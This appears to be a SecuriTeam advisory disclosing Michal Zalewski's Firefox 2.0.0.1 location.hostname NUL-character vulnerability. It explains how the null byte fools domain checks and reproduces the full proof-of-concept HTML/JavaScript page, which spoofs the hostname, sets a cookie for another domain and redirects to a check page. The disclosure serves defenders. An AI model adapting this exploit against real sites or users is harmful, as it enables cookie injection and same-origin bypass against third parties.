[NEWS] Firefox Same-Domain Bypass Vulnerability (NULL Character)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Firefox Same-Domain Bypass Vulnerability (NULL Character)
------------------------------------------------------------------------


SUMMARY

A vulnerability in the way Firefox handles writes to the
'location.hostname' DOM property allows a script to set it to values that
would not otherwise be accepted as a hostname when parsing a regular URL -
including a string containing \x00.

DETAILS

There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1,
but quite certainly affecting all recent versions.

The problem lies in how Firefox handles writes to the 'location.hostname'
DOM property. It is possible for a script to set it to values that would
not otherwise be accepted as a hostname when parsing a regular URL -
including a string containing \x00.

Doing this prompts a peculiar behavior: internally, DOM string variables
are not NUL-terminated, and as such, most of checks will consider
'evil.com\x00foo.example.com' to be a part of *.example.com domain. The
DNS resolver, however, and much of the remaining browser code, operates on
ASCIZ strings native to C/C++ instead, treating the aforementioned example
as 'evil.com'.

This makes it possible for evil.com to modify location.hostname as
described above, and have the resulting HTTP request still sent to
evil.com. Once the new page is loaded, the attacker will be able to set
cookies for *.example.com; he'll be also able to alter document.domain
accordingly, in order to bypass the same-origin policy for XMLHttpRequest
and cross-frame / cross-window data access.

A quick demonstration is available here:
<http://lcamtuf.dione.cc/ffhostname.html>
http://lcamtuf.dione.cc/ffhostname.html

<html>
<head>
<title>Firefox location.hostname vulnerability demo
(lcamtuf@xxxxxxxxxxx)</title>
</head>

<body style="width: 700px" onload="do_evil(1)">

<script>

function do_evil(onload) {
if (!onload) {
try { location.hostname='lcamtuf.dione.cc\x00www.coredump.cx'; }
catch (err) { alert('Failed to modify location.hostname - probably
not vulnerable.'); }
} else if (location.hostname != 'lcamtuf.dione.cc') {
document.cookie = 'testcookie=1234; domain=.coredump.cx; path=/';
window.location = 'http://lcamtuf.coredump.cx/ffhostname.cgi';
}

}

</script>

<font face="arial" size="+0">
<font size="+1" color="purple"><b>Firefox location.hostname vulnerability
demo</b></font>
<hr size="1">
<p>
This page tests for a serious security vulnerability in Firefox 2.0.0.1
(and
prior). The vulnerability allows malicious websites to manipulate
authentication
cookies for third-party sites, and possibly issue <tt>XMLHttpRequests</tt>
to these
locations, or interact with someone else's frames and windows.
<p>
The test will attempt to impersonate a different site,
<tt>coredump.cx</tt>,
then set a test cookie for that domain. You will be then taken to that
other site
to verify the outcome.
<p>
<b>Note that Javascript is required for the exploit to work.</b>
<p>
<input type=button onclick="do_evil(0)" value="Click here to begin test">
<p>
Comments and questions: <a href="mailto:lcamtuf@xxxxxxxxxxx";>Michal
Zalewski <lcamtuf@xxxxxxxxxxx></a>
</body>
</html>

If you want to confirm a successful exploitation, check Tools -> Options
-> Privacy -> Show Cookies... for coredump.cx after the test; for the demo
to succeed, the browser needs to have Javascript enabled, and must accept
session cookies.

Impact:
The impact is quite severe: malicious sites can manipulate authentication
cookies for third-party webpages, and, by the virtue of bypassing
same-origin policy, can possibly tamper with the way these sites are
displayed or how they work.


ADDITIONAL INFORMATION

The information has been provided by <mailto:lcamtuf@xxxxxxxxxxxx> Michal
Zalewski.
The original article can be found at: <http://lcamtuf.coredump.cx/>
http://lcamtuf.coredump.cx/



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages